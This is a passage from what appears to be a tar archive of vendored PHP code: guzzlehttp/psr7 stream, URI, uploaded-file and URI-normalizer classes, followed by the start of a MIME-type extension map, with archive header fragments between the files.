Utils::copyToString($this); } catch (\Throwable $e) { if (\PHP_VERSION_ID >= 70400) { throw $e; } trigger_error(sprintf('%s::__toString exception: %s', self::class, (string) $e), E_USER_ERROR); return ''; } } public function close(): void { $this->detach(); } public function detach() { $this->tellPos = 0; $this->source = null; return null; } public function getSize(): ?int { return $this->size; } public function tell(): int { return $this->tellPos; } public function eof(): bool { return $this->source === null; } public function isSeekable(): bool { return false; } public function rewind(): void { $this->seek(0); } public function seek($offset, $whence = SEEK_SET): void { throw new \RuntimeException('Cannot seek a PumpStream'); } public function isWritable(): bool { return false; } public function write($string): int { throw new \RuntimeException('Cannot write to a PumpStream'); } public function isReadable(): bool { return true; } public function read($length): string { $data = $this->buffer->read($length); $readLen = strlen($data); $this->tellPos += $readLen; $remaining = $length - $readLen; if ($remaining) { $this->pump($remaining); $data .= $this->buffer->read($remaining); $this->tellPos += strlen($data) - $readLen; } return $data; } public function getContents(): string { $result = ''; while (!$this->eof()) { $result .= $this->read(1000000); } return $result; } /** * @return mixed */ public function getMetadata($key = null) { if (!$key) { return $this->metadata; } return $this->metadata[$key] ?? null; } private function pump(int $length): void { if ($this->source !== null) { do { $data = ($this->source)($length); if ($data === false || $data === null) { $this->source = null; return; } $this->buffer->write($data); $length -= strlen($data); } while ($length > 0); } } } google-api/vendor/guzzlehttp/psr7/src/FnStream.php000064400000010325147600400120016211 0ustar00 */ private $methods; /** * @param array $methods Hash of method name to a callable. */ public function __construct(array $methods) { $this->methods = $methods; // Create the functions on the class foreach ($methods as $name => $fn) { $this->{'_fn_'.$name} = $fn; } } /** * Lazily determine which methods are not implemented. * * @throws \BadMethodCallException */ public function __get(string $name): void { throw new \BadMethodCallException(str_replace('_fn_', '', $name) .'() is not implemented in the FnStream'); } /** * The close method is called on the underlying stream only if possible. */ public function __destruct() { if (isset($this->_fn_close)) { ($this->_fn_close)(); } } /** * An unserialize would allow the __destruct to run when the unserialized value goes out of scope. * * @throws \LogicException */ public function __wakeup(): void { throw new \LogicException('FnStream should never be unserialized'); } /** * Adds custom functionality to an underlying stream by intercepting * specific method calls. * * @param StreamInterface $stream Stream to decorate * @param array $methods Hash of method name to a closure * * @return FnStream */ public static function decorate(StreamInterface $stream, array $methods) { // If any of the required methods were not provided, then simply // proxy to the decorated stream. foreach (array_diff(self::SLOTS, array_keys($methods)) as $diff) { /** @var callable $callable */ $callable = [$stream, $diff]; $methods[$diff] = $callable; } return new self($methods); } public function __toString(): string { try { /** @var string */ return ($this->_fn___toString)(); } catch (\Throwable $e) { if (\PHP_VERSION_ID >= 70400) { throw $e; } trigger_error(sprintf('%s::__toString exception: %s', self::class, (string) $e), E_USER_ERROR); return ''; } } public function close(): void { ($this->_fn_close)(); } public function detach() { return ($this->_fn_detach)(); } public function getSize(): ?int { return ($this->_fn_getSize)(); } public function tell(): int { return ($this->_fn_tell)(); } public function eof(): bool { return ($this->_fn_eof)(); } public function isSeekable(): bool { return ($this->_fn_isSeekable)(); } public function rewind(): void { ($this->_fn_rewind)(); } public function seek($offset, $whence = SEEK_SET): void { ($this->_fn_seek)($offset, $whence); } public function isWritable(): bool { return ($this->_fn_isWritable)(); } public function write($string): int { return ($this->_fn_write)($string); } public function isReadable(): bool { return ($this->_fn_isReadable)(); } public function read($length): string { return ($this->_fn_read)($length); } public function getContents(): string { return ($this->_fn_getContents)(); } /** * @return mixed */ public function getMetadata($key = null) { return ($this->_fn_getMetadata)($key); } } google-api/vendor/guzzlehttp/psr7/src/Uri.php000064400000052703147600400120015237 0ustar00 80, 'https' => 443, 'ftp' => 21, 'gopher' => 70, 'nntp' => 119, 'news' => 119, 'telnet' => 23, 'tn3270' => 23, 'imap' => 143, 'pop' => 110, 'ldap' => 389, ]; /** * Unreserved characters for use in a regex. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-2.3 */ private const CHAR_UNRESERVED = 'a-zA-Z0-9_\-\.~'; /** * Sub-delims for use in a regex. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-2.2 */ private const CHAR_SUB_DELIMS = '!\$&\'\(\)\*\+,;='; private const QUERY_SEPARATORS_REPLACEMENT = ['=' => '%3D', '&' => '%26']; /** @var string Uri scheme. */ private $scheme = ''; /** @var string Uri user info. */ private $userInfo = ''; /** @var string Uri host. */ private $host = ''; /** @var int|null Uri port. */ private $port; /** @var string Uri path. */ private $path = ''; /** @var string Uri query string. */ private $query = ''; /** @var string Uri fragment. */ private $fragment = ''; /** @var string|null String representation */ private $composedComponents; public function __construct(string $uri = '') { if ($uri !== '') { $parts = self::parse($uri); if ($parts === false) { throw new MalformedUriException("Unable to parse URI: $uri"); } $this->applyParts($parts); } } /** * UTF-8 aware \parse_url() replacement. * * The internal function produces broken output for non ASCII domain names * (IDN) when used with locales other than "C". * * On the other hand, cURL understands IDN correctly only when UTF-8 locale * is configured ("C.UTF-8", "en_US.UTF-8", etc.). * * @see https://bugs.php.net/bug.php?id=52923 * @see https://www.php.net/manual/en/function.parse-url.php#114817 * @see https://curl.haxx.se/libcurl/c/CURLOPT_URL.html#ENCODING * * @return array|false */ private static function parse(string $url) { // If IPv6 $prefix = ''; if (preg_match('%^(.*://\[[0-9:a-f]+\])(.*?)$%', $url, $matches)) { /** @var array{0:string, 1:string, 2:string} $matches */ $prefix = $matches[1]; $url = $matches[2]; } /** @var string */ $encodedUrl = preg_replace_callback( '%[^:/@?&=#]+%usD', static function ($matches) { return urlencode($matches[0]); }, $url ); $result = parse_url($prefix.$encodedUrl); if ($result === false) { return false; } return array_map('urldecode', $result); } public function __toString(): string { if ($this->composedComponents === null) { $this->composedComponents = self::composeComponents( $this->scheme, $this->getAuthority(), $this->path, $this->query, $this->fragment ); } return $this->composedComponents; } /** * Composes a URI reference string from its various components. * * Usually this method does not need to be called manually but instead is used indirectly via * `Psr\Http\Message\UriInterface::__toString`. * * PSR-7 UriInterface treats an empty component the same as a missing component as * getQuery(), getFragment() etc. always return a string. This explains the slight * difference to RFC 3986 Section 5.3. * * Another adjustment is that the authority separator is added even when the authority is missing/empty * for the "file" scheme. This is because PHP stream functions like `file_get_contents` only work with * `file:///myfile` but not with `file:/myfile` although they are equivalent according to RFC 3986. But * `file:///` is the more common syntax for the file scheme anyway (Chrome for example redirects to * that format). * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-5.3 */ public static function composeComponents(?string $scheme, ?string $authority, string $path, ?string $query, ?string $fragment): string { $uri = ''; // weak type checks to also accept null until we can add scalar type hints if ($scheme != '') { $uri .= $scheme.':'; } if ($authority != '' || $scheme === 'file') { $uri .= '//'.$authority; } if ($authority != '' && $path != '' && $path[0] != '/') { $path = '/'.$path; } $uri .= $path; if ($query != '') { $uri .= '?'.$query; } if ($fragment != '') { $uri .= '#'.$fragment; } return $uri; } /** * Whether the URI has the default port of the current scheme. * * `Psr\Http\Message\UriInterface::getPort` may return null or the standard port. This method can be used * independently of the implementation. */ public static function isDefaultPort(UriInterface $uri): bool { return $uri->getPort() === null || (isset(self::DEFAULT_PORTS[$uri->getScheme()]) && $uri->getPort() === self::DEFAULT_PORTS[$uri->getScheme()]); } /** * Whether the URI is absolute, i.e. it has a scheme. * * An instance of UriInterface can either be an absolute URI or a relative reference. This method returns true * if it is the former. An absolute URI has a scheme. A relative reference is used to express a URI relative * to another URI, the base URI. Relative references can be divided into several forms: * - network-path references, e.g. '//example.com/path' * - absolute-path references, e.g. '/path' * - relative-path references, e.g. 'subpath' * * @see Uri::isNetworkPathReference * @see Uri::isAbsolutePathReference * @see Uri::isRelativePathReference * @see https://datatracker.ietf.org/doc/html/rfc3986#section-4 */ public static function isAbsolute(UriInterface $uri): bool { return $uri->getScheme() !== ''; } /** * Whether the URI is a network-path reference. * * A relative reference that begins with two slash characters is termed an network-path reference. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-4.2 */ public static function isNetworkPathReference(UriInterface $uri): bool { return $uri->getScheme() === '' && $uri->getAuthority() !== ''; } /** * Whether the URI is a absolute-path reference. * * A relative reference that begins with a single slash character is termed an absolute-path reference. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-4.2 */ public static function isAbsolutePathReference(UriInterface $uri): bool { return $uri->getScheme() === '' && $uri->getAuthority() === '' && isset($uri->getPath()[0]) && $uri->getPath()[0] === '/'; } /** * Whether the URI is a relative-path reference. * * A relative reference that does not begin with a slash character is termed a relative-path reference. * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-4.2 */ public static function isRelativePathReference(UriInterface $uri): bool { return $uri->getScheme() === '' && $uri->getAuthority() === '' && (!isset($uri->getPath()[0]) || $uri->getPath()[0] !== '/'); } /** * Whether the URI is a same-document reference. * * A same-document reference refers to a URI that is, aside from its fragment * component, identical to the base URI. When no base URI is given, only an empty * URI reference (apart from its fragment) is considered a same-document reference. * * @param UriInterface $uri The URI to check * @param UriInterface|null $base An optional base URI to compare against * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-4.4 */ public static function isSameDocumentReference(UriInterface $uri, UriInterface $base = null): bool { if ($base !== null) { $uri = UriResolver::resolve($base, $uri); return ($uri->getScheme() === $base->getScheme()) && ($uri->getAuthority() === $base->getAuthority()) && ($uri->getPath() === $base->getPath()) && ($uri->getQuery() === $base->getQuery()); } return $uri->getScheme() === '' && $uri->getAuthority() === '' && $uri->getPath() === '' && $uri->getQuery() === ''; } /** * Creates a new URI with a specific query string value removed. * * Any existing query string values that exactly match the provided key are * removed. * * @param UriInterface $uri URI to use as a base. * @param string $key Query string key to remove. */ public static function withoutQueryValue(UriInterface $uri, string $key): UriInterface { $result = self::getFilteredQueryString($uri, [$key]); return $uri->withQuery(implode('&', $result)); } /** * Creates a new URI with a specific query string value. * * Any existing query string values that exactly match the provided key are * removed and replaced with the given key value pair. * * A value of null will set the query string key without a value, e.g. "key" * instead of "key=value". * * @param UriInterface $uri URI to use as a base. * @param string $key Key to set. * @param string|null $value Value to set */ public static function withQueryValue(UriInterface $uri, string $key, ?string $value): UriInterface { $result = self::getFilteredQueryString($uri, [$key]); $result[] = self::generateQueryString($key, $value); return $uri->withQuery(implode('&', $result)); } /** * Creates a new URI with multiple specific query string values. * * It has the same behavior as withQueryValue() but for an associative array of key => value. * * @param UriInterface $uri URI to use as a base. * @param (string|null)[] $keyValueArray Associative array of key and values */ public static function withQueryValues(UriInterface $uri, array $keyValueArray): UriInterface { $result = self::getFilteredQueryString($uri, array_keys($keyValueArray)); foreach ($keyValueArray as $key => $value) { $result[] = self::generateQueryString((string) $key, $value !== null ? (string) $value : null); } return $uri->withQuery(implode('&', $result)); } /** * Creates a URI from a hash of `parse_url` components. * * @see https://www.php.net/manual/en/function.parse-url.php * * @throws MalformedUriException If the components do not form a valid URI. */ public static function fromParts(array $parts): UriInterface { $uri = new self(); $uri->applyParts($parts); $uri->validateState(); return $uri; } public function getScheme(): string { return $this->scheme; } public function getAuthority(): string { $authority = $this->host; if ($this->userInfo !== '') { $authority = $this->userInfo.'@'.$authority; } if ($this->port !== null) { $authority .= ':'.$this->port; } return $authority; } public function getUserInfo(): string { return $this->userInfo; } public function getHost(): string { return $this->host; } public function getPort(): ?int { return $this->port; } public function getPath(): string { return $this->path; } public function getQuery(): string { return $this->query; } public function getFragment(): string { return $this->fragment; } public function withScheme($scheme): UriInterface { $scheme = $this->filterScheme($scheme); if ($this->scheme === $scheme) { return $this; } $new = clone $this; $new->scheme = $scheme; $new->composedComponents = null; $new->removeDefaultPort(); $new->validateState(); return $new; } public function withUserInfo($user, $password = null): UriInterface { $info = $this->filterUserInfoComponent($user); if ($password !== null) { $info .= ':'.$this->filterUserInfoComponent($password); } if ($this->userInfo === $info) { return $this; } $new = clone $this; $new->userInfo = $info; $new->composedComponents = null; $new->validateState(); return $new; } public function withHost($host): UriInterface { $host = $this->filterHost($host); if ($this->host === $host) { return $this; } $new = clone $this; $new->host = $host; $new->composedComponents = null; $new->validateState(); return $new; } public function withPort($port): UriInterface { $port = $this->filterPort($port); if ($this->port === $port) { return $this; } $new = clone $this; $new->port = $port; $new->composedComponents = null; $new->removeDefaultPort(); $new->validateState(); return $new; } public function withPath($path): UriInterface { $path = $this->filterPath($path); if ($this->path === $path) { return $this; } $new = clone $this; $new->path = $path; $new->composedComponents = null; $new->validateState(); return $new; } public function withQuery($query): UriInterface { $query = $this->filterQueryAndFragment($query); if ($this->query === $query) { return $this; } $new = clone $this; $new->query = $query; $new->composedComponents = null; return $new; } public function withFragment($fragment): UriInterface { $fragment = $this->filterQueryAndFragment($fragment); if ($this->fragment === $fragment) { return $this; } $new = clone $this; $new->fragment = $fragment; $new->composedComponents = null; return $new; } public function jsonSerialize(): string { return $this->__toString(); } /** * Apply parse_url parts to a URI. * * @param array $parts Array of parse_url parts to apply. */ private function applyParts(array $parts): void { $this->scheme = isset($parts['scheme']) ? $this->filterScheme($parts['scheme']) : ''; $this->userInfo = isset($parts['user']) ? $this->filterUserInfoComponent($parts['user']) : ''; $this->host = isset($parts['host']) ? $this->filterHost($parts['host']) : ''; $this->port = isset($parts['port']) ? $this->filterPort($parts['port']) : null; $this->path = isset($parts['path']) ? $this->filterPath($parts['path']) : ''; $this->query = isset($parts['query']) ? $this->filterQueryAndFragment($parts['query']) : ''; $this->fragment = isset($parts['fragment']) ? $this->filterQueryAndFragment($parts['fragment']) : ''; if (isset($parts['pass'])) { $this->userInfo .= ':'.$this->filterUserInfoComponent($parts['pass']); } $this->removeDefaultPort(); } /** * @param mixed $scheme * * @throws \InvalidArgumentException If the scheme is invalid. */ private function filterScheme($scheme): string { if (!is_string($scheme)) { throw new \InvalidArgumentException('Scheme must be a string'); } return \strtr($scheme, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 'abcdefghijklmnopqrstuvwxyz'); } /** * @param mixed $component * * @throws \InvalidArgumentException If the user info is invalid. */ private function filterUserInfoComponent($component): string { if (!is_string($component)) { throw new \InvalidArgumentException('User info must be a string'); } return preg_replace_callback( '/(?:[^%'.self::CHAR_UNRESERVED.self::CHAR_SUB_DELIMS.']+|%(?![A-Fa-f0-9]{2}))/', [$this, 'rawurlencodeMatchZero'], $component ); } /** * @param mixed $host * * @throws \InvalidArgumentException If the host is invalid. */ private function filterHost($host): string { if (!is_string($host)) { throw new \InvalidArgumentException('Host must be a string'); } return \strtr($host, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 'abcdefghijklmnopqrstuvwxyz'); } /** * @param mixed $port * * @throws \InvalidArgumentException If the port is invalid. */ private function filterPort($port): ?int { if ($port === null) { return null; } $port = (int) $port; if (0 > $port || 0xFFFF < $port) { throw new \InvalidArgumentException( sprintf('Invalid port: %d. Must be between 0 and 65535', $port) ); } return $port; } /** * @param (string|int)[] $keys * * @return string[] */ private static function getFilteredQueryString(UriInterface $uri, array $keys): array { $current = $uri->getQuery(); if ($current === '') { return []; } $decodedKeys = array_map(function ($k): string { return rawurldecode((string) $k); }, $keys); return array_filter(explode('&', $current), function ($part) use ($decodedKeys) { return !in_array(rawurldecode(explode('=', $part)[0]), $decodedKeys, true); }); } private static function generateQueryString(string $key, ?string $value): string { // Query string separators ("=", "&") within the key or value need to be encoded // (while preventing double-encoding) before setting the query string. All other // chars that need percent-encoding will be encoded by withQuery(). $queryString = strtr($key, self::QUERY_SEPARATORS_REPLACEMENT); if ($value !== null) { $queryString .= '='.strtr($value, self::QUERY_SEPARATORS_REPLACEMENT); } return $queryString; } private function removeDefaultPort(): void { if ($this->port !== null && self::isDefaultPort($this)) { $this->port = null; } } /** * Filters the path of a URI * * @param mixed $path * * @throws \InvalidArgumentException If the path is invalid. */ private function filterPath($path): string { if (!is_string($path)) { throw new \InvalidArgumentException('Path must be a string'); } return preg_replace_callback( '/(?:[^'.self::CHAR_UNRESERVED.self::CHAR_SUB_DELIMS.'%:@\/]++|%(?![A-Fa-f0-9]{2}))/', [$this, 'rawurlencodeMatchZero'], $path ); } /** * Filters the query string or fragment of a URI. * * @param mixed $str * * @throws \InvalidArgumentException If the query or fragment is invalid. */ private function filterQueryAndFragment($str): string { if (!is_string($str)) { throw new \InvalidArgumentException('Query and fragment must be a string'); } return preg_replace_callback( '/(?:[^'.self::CHAR_UNRESERVED.self::CHAR_SUB_DELIMS.'%:@\/\?]++|%(?![A-Fa-f0-9]{2}))/', [$this, 'rawurlencodeMatchZero'], $str ); } private function rawurlencodeMatchZero(array $match): string { return rawurlencode($match[0]); } private function validateState(): void { if ($this->host === '' && ($this->scheme === 'http' || $this->scheme === 'https')) { $this->host = self::HTTP_DEFAULT_HOST; } if ($this->getAuthority() === '') { if (0 === strpos($this->path, '//')) { throw new MalformedUriException('The path of a URI without an authority must not start with two slashes "//"'); } if ($this->scheme === '' && false !== strpos(explode('/', $this->path, 2)[0], ':')) { throw new MalformedUriException('A relative URI must not have a path beginning with a segment containing a colon'); } } } } google-api/vendor/guzzlehttp/psr7/src/UploadedFile.php000064400000011401147600400120017023 0ustar00setError($errorStatus); $this->size = $size; $this->clientFilename = $clientFilename; $this->clientMediaType = $clientMediaType; if ($this->isOk()) { $this->setStreamOrFile($streamOrFile); } } /** * Depending on the value set file or stream variable * * @param StreamInterface|string|resource $streamOrFile * * @throws InvalidArgumentException */ private function setStreamOrFile($streamOrFile): void { if (is_string($streamOrFile)) { $this->file = $streamOrFile; } elseif (is_resource($streamOrFile)) { $this->stream = new Stream($streamOrFile); } elseif ($streamOrFile instanceof StreamInterface) { $this->stream = $streamOrFile; } else { throw new InvalidArgumentException( 'Invalid stream or file provided for UploadedFile' ); } } /** * @throws InvalidArgumentException */ private function setError(int $error): void { if (false === in_array($error, UploadedFile::ERRORS, true)) { throw new InvalidArgumentException( 'Invalid error status for UploadedFile' ); } $this->error = $error; } private static function isStringNotEmpty($param): bool { return is_string($param) && false === empty($param); } /** * Return true if there is no upload error */ private function isOk(): bool { return $this->error === UPLOAD_ERR_OK; } public function isMoved(): bool { return $this->moved; } /** * @throws RuntimeException if is moved or not ok */ private function validateActive(): void { if (false === $this->isOk()) { throw new RuntimeException('Cannot retrieve stream due to upload error'); } if ($this->isMoved()) { throw new RuntimeException('Cannot retrieve stream after it has already been moved'); } } public function getStream(): StreamInterface { $this->validateActive(); if ($this->stream instanceof StreamInterface) { return $this->stream; } /** @var string $file */ $file = $this->file; return new LazyOpenStream($file, 'r+'); } public function moveTo($targetPath): void { $this->validateActive(); if (false === self::isStringNotEmpty($targetPath)) { throw new InvalidArgumentException( 'Invalid path provided for move operation; must be a non-empty string' ); } if ($this->file) { $this->moved = PHP_SAPI === 'cli' ? rename($this->file, $targetPath) : move_uploaded_file($this->file, $targetPath); } else { Utils::copyToStream( $this->getStream(), new LazyOpenStream($targetPath, 'w') ); $this->moved = true; } if (false === $this->moved) { throw new RuntimeException( sprintf('Uploaded file could not be moved to %s', $targetPath) ); } } public function getSize(): ?int { return $this->size; } public function getError(): int { return $this->error; } public function getClientFilename(): ?string { return $this->clientFilename; } public function getClientMediaType(): ?string { return $this->clientMediaType; } } google-api/vendor/guzzlehttp/psr7/src/NoSeekStream.php000064400000001014147600400120017025 0ustar00getPath() === '' && ($uri->getScheme() === 'http' || $uri->getScheme() === 'https') ) { $uri = $uri->withPath('/'); } if ($flags & self::REMOVE_DEFAULT_HOST && $uri->getScheme() === 'file' && $uri->getHost() === 'localhost') { $uri = $uri->withHost(''); } if ($flags & self::REMOVE_DEFAULT_PORT && $uri->getPort() !== null && Uri::isDefaultPort($uri)) { $uri = $uri->withPort(null); } if ($flags & self::REMOVE_DOT_SEGMENTS && !Uri::isRelativePathReference($uri)) { $uri = $uri->withPath(UriResolver::removeDotSegments($uri->getPath())); } if ($flags & self::REMOVE_DUPLICATE_SLASHES) { $uri = $uri->withPath(preg_replace('#//++#', '/', $uri->getPath())); } if ($flags & self::SORT_QUERY_PARAMETERS && $uri->getQuery() !== '') { $queryKeyValues = explode('&', $uri->getQuery()); sort($queryKeyValues); $uri = $uri->withQuery(implode('&', $queryKeyValues)); } return $uri; } /** * Whether two URIs can be considered equivalent. * * Both URIs are normalized automatically before comparison with the given $normalizations bitmask. The method also * accepts relative URI references and returns true when they are equivalent. This of course assumes they will be * resolved against the same base URI. If this is not the case, determination of equivalence or difference of * relative references does not mean anything. * * @param UriInterface $uri1 An URI to compare * @param UriInterface $uri2 An URI to compare * @param int $normalizations A bitmask of normalizations to apply, see constants * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-6.1 */ public static function isEquivalent(UriInterface $uri1, UriInterface $uri2, int $normalizations = self::PRESERVING_NORMALIZATIONS): bool { return (string) self::normalize($uri1, $normalizations) === (string) self::normalize($uri2, $normalizations); } private static function capitalizePercentEncoding(UriInterface $uri): UriInterface { $regex = '/(?:%[A-Fa-f0-9]{2})++/'; $callback = function (array $match): string { return strtoupper($match[0]); }; return $uri->withPath( preg_replace_callback($regex, $callback, $uri->getPath()) )->withQuery( preg_replace_callback($regex, $callback, $uri->getQuery()) ); } private static function decodeUnreservedCharacters(UriInterface $uri): UriInterface { $regex = '/%(?:2D|2E|5F|7E|3[0-9]|[46][1-9A-F]|[57][0-9A])/i'; $callback = function (array $match): string { return rawurldecode($match[0]); }; return $uri->withPath( preg_replace_callback($regex, $callback, $uri->getPath()) )->withQuery( preg_replace_callback($regex, $callback, $uri->getQuery()) ); } private function __construct() { // cannot be instantiated } } google-api/vendor/guzzlehttp/psr7/src/StreamDecoratorTrait.php000064400000006366147600400120020606 0ustar00stream = $stream; } /** * Magic method used to create a new stream if streams are not added in * the constructor of a decorator (e.g., LazyOpenStream). * * @return StreamInterface */ public function __get(string $name) { if ($name === 'stream') { $this->stream = $this->createStream(); return $this->stream; } throw new \UnexpectedValueException("$name not found on class"); } public function __toString(): string { try { if ($this->isSeekable()) { $this->seek(0); } return $this->getContents(); } catch (\Throwable $e) { if (\PHP_VERSION_ID >= 70400) { throw $e; } trigger_error(sprintf('%s::__toString exception: %s', self::class, (string) $e), E_USER_ERROR); return ''; } } public function getContents(): string { return Utils::copyToString($this); } /** * Allow decorators to implement custom methods * * @return mixed */ public function __call(string $method, array $args) { /** @var callable $callable */ $callable = [$this->stream, $method]; $result = ($callable)(...$args); // Always return the wrapped object if the result is a return $this return $result === $this->stream ? $this : $result; } public function close(): void { $this->stream->close(); } /** * @return mixed */ public function getMetadata($key = null) { return $this->stream->getMetadata($key); } public function detach() { return $this->stream->detach(); } public function getSize(): ?int { return $this->stream->getSize(); } public function eof(): bool { return $this->stream->eof(); } public function tell(): int { return $this->stream->tell(); } public function isReadable(): bool { return $this->stream->isReadable(); } public function isWritable(): bool { return $this->stream->isWritable(); } public function isSeekable(): bool { return $this->stream->isSeekable(); } public function rewind(): void { $this->seek(0); } public function seek($offset, $whence = SEEK_SET): void { $this->stream->seek($offset, $whence); } public function read($length): string { return $this->stream->read($length); } public function write($string): int { return $this->stream->write($string); } /** * Implement in subclasses to dynamically create streams when requested. * * @throws \BadMethodCallException */ protected function createStream(): StreamInterface { throw new \BadMethodCallException('Not implemented'); } } google-api/vendor/guzzlehttp/psr7/src/MimeType.php000064400000153375147600400120016240 0ustar00 'application/vnd.1000minds.decision-model+xml', '3dml' => 'text/vnd.in3d.3dml', '3ds' => 'image/x-3ds', '3g2' => 'video/3gpp2', '3gp' => 'video/3gp', '3gpp' => 'video/3gpp', '3mf' => 'model/3mf', '7z' => 'application/x-7z-compressed', '7zip' => 'application/x-7z-compressed', '123' => 'application/vnd.lotus-1-2-3', 'aab' => 'application/x-authorware-bin', 'aac' => 'audio/aac', 'aam' => 'application/x-authorware-map', 'aas' => 'application/x-authorware-seg', 'abw' => 'application/x-abiword', 'ac' => 'application/vnd.nokia.n-gage.ac+xml', 'ac3' => 'audio/ac3', 'acc' => 'application/vnd.americandynamics.acc', 'ace' => 'application/x-ace-compressed', 'acu' => 'application/vnd.acucobol', 'acutc' => 'application/vnd.acucorp', 'adp' => 'audio/adpcm', 'adts' => 'audio/aac', 'aep' => 'application/vnd.audiograph', 'afm' => 'application/x-font-type1', 'afp' => 'application/vnd.ibm.modcap', 'age' => 'application/vnd.age', 'ahead' => 'application/vnd.ahead.space', 'ai' => 'application/pdf', 'aif' => 'audio/x-aiff', 'aifc' => 'audio/x-aiff', 'aiff' => 'audio/x-aiff', 'air' => 'application/vnd.adobe.air-application-installer-package+zip', 'ait' => 'application/vnd.dvb.ait', 'ami' => 'application/vnd.amiga.ami', 'aml' => 'application/automationml-aml+xml', 'amlx' => 'application/automationml-amlx+zip', 'amr' => 'audio/amr', 'apk' => 'application/vnd.android.package-archive', 'apng' => 'image/apng', 'appcache' => 'text/cache-manifest', 'appinstaller' => 'application/appinstaller', 'application' => 'application/x-ms-application', 'appx' => 'application/appx', 'appxbundle' => 'application/appxbundle', 'apr' => 'application/vnd.lotus-approach', 'arc' => 'application/x-freearc', 'arj' => 'application/x-arj', 'asc' => 'application/pgp-signature', 'asf' => 'video/x-ms-asf', 'asm' => 'text/x-asm', 'aso' => 'application/vnd.accpac.simply.aso', 'asx' => 'video/x-ms-asf', 'atc' => 'application/vnd.acucorp', 'atom' => 'application/atom+xml', 'atomcat' => 'application/atomcat+xml', 'atomdeleted' => 'application/atomdeleted+xml', 'atomsvc' => 'application/atomsvc+xml', 'atx' => 'application/vnd.antix.game-component', 'au' => 'audio/x-au', 'avci' => 'image/avci', 'avcs' => 'image/avcs', 'avi' => 'video/x-msvideo', 'avif' => 'image/avif', 'aw' => 'application/applixware', 'azf' => 'application/vnd.airzip.filesecure.azf', 'azs' => 'application/vnd.airzip.filesecure.azs', 'azv' => 'image/vnd.airzip.accelerator.azv', 'azw' => 'application/vnd.amazon.ebook', 'b16' => 'image/vnd.pco.b16', 'bat' => 'application/x-msdownload', 'bcpio' => 'application/x-bcpio', 'bdf' => 'application/x-font-bdf', 'bdm' => 'application/vnd.syncml.dm+wbxml', 'bdoc' => 'application/x-bdoc', 'bed' => 'application/vnd.realvnc.bed', 'bh2' => 'application/vnd.fujitsu.oasysprs', 'bin' => 'application/octet-stream', 'blb' => 'application/x-blorb', 'blorb' => 'application/x-blorb', 'bmi' => 'application/vnd.bmi', 'bmml' => 'application/vnd.balsamiq.bmml+xml', 'bmp' => 'image/bmp', 'book' => 'application/vnd.framemaker', 'box' => 'application/vnd.previewsystems.box', 'boz' => 'application/x-bzip2', 'bpk' => 'application/octet-stream', 'bpmn' => 'application/octet-stream', 'bsp' => 'model/vnd.valve.source.compiled-map', 'btf' => 'image/prs.btif', 'btif' => 'image/prs.btif', 'buffer' => 'application/octet-stream', 'bz' => 'application/x-bzip', 'bz2' => 'application/x-bzip2', 'c' => 'text/x-c', 'c4d' => 'application/vnd.clonk.c4group', 'c4f' => 'application/vnd.clonk.c4group', 'c4g' => 'application/vnd.clonk.c4group', 'c4p' => 'application/vnd.clonk.c4group', 'c4u' => 'application/vnd.clonk.c4group', 'c11amc' => 'application/vnd.cluetrust.cartomobile-config', 'c11amz' => 'application/vnd.cluetrust.cartomobile-config-pkg', 'cab' => 'application/vnd.ms-cab-compressed', 'caf' => 'audio/x-caf', 'cap' => 'application/vnd.tcpdump.pcap', 'car' => 'application/vnd.curl.car', 'cat' => 'application/vnd.ms-pki.seccat', 'cb7' => 'application/x-cbr', 'cba' => 'application/x-cbr', 'cbr' => 'application/x-cbr', 'cbt' => 'application/x-cbr', 'cbz' => 'application/x-cbr', 'cc' => 'text/x-c', 'cco' => 'application/x-cocoa', 'cct' => 'application/x-director', 'ccxml' => 'application/ccxml+xml', 'cdbcmsg' => 'application/vnd.contact.cmsg', 'cdf' => 'application/x-netcdf', 'cdfx' => 'application/cdfx+xml', 'cdkey' => 'application/vnd.mediastation.cdkey', 'cdmia' => 'application/cdmi-capability', 'cdmic' => 'application/cdmi-container', 'cdmid' => 'application/cdmi-domain', 'cdmio' => 'application/cdmi-object', 'cdmiq' => 'application/cdmi-queue', 'cdr' => 'application/cdr', 'cdx' => 'chemical/x-cdx', 'cdxml' => 'application/vnd.chemdraw+xml', 'cdy' => 'application/vnd.cinderella', 'cer' => 'application/pkix-cert', 'cfs' => 'application/x-cfs-compressed', 'cgm' => 'image/cgm', 'chat' => 'application/x-chat', 'chm' => 'application/vnd.ms-htmlhelp', 'chrt' => 'application/vnd.kde.kchart', 'cif' => 'chemical/x-cif', 'cii' => 'application/vnd.anser-web-certificate-issue-initiation', 'cil' => 'application/vnd.ms-artgalry', 'cjs' => 'application/node', 'cla' => 'application/vnd.claymore', 'class' => 'application/octet-stream', 'cld' => 'model/vnd.cld', 'clkk' => 'application/vnd.crick.clicker.keyboard', 'clkp' => 'application/vnd.crick.clicker.palette', 'clkt' => 'application/vnd.crick.clicker.template', 'clkw' => 'application/vnd.crick.clicker.wordbank', 'clkx' => 'application/vnd.crick.clicker', 'clp' => 'application/x-msclip', 'cmc' => 'application/vnd.cosmocaller', 'cmdf' => 'chemical/x-cmdf', 'cml' => 'chemical/x-cml', 'cmp' => 'application/vnd.yellowriver-custom-menu', 'cmx' => 'image/x-cmx', 'cod' => 'application/vnd.rim.cod', 'coffee' => 'text/coffeescript', 'com' => 'application/x-msdownload', 'conf' => 'text/plain', 'cpio' => 'application/x-cpio', 'cpl' => 'application/cpl+xml', 'cpp' => 'text/x-c', 'cpt' => 'application/mac-compactpro', 'crd' => 'application/x-mscardfile', 'crl' => 'application/pkix-crl', 'crt' => 'application/x-x509-ca-cert', 'crx' => 'application/x-chrome-extension', 'cryptonote' => 'application/vnd.rig.cryptonote', 'csh' => 'application/x-csh', 'csl' => 'application/vnd.citationstyles.style+xml', 'csml' => 'chemical/x-csml', 'csp' => 'application/vnd.commonspace', 'csr' => 'application/octet-stream', 'css' => 'text/css', 'cst' => 'application/x-director', 'csv' => 'text/csv', 'cu' => 'application/cu-seeme', 'curl' => 'text/vnd.curl', 'cwl' => 'application/cwl', 'cww' => 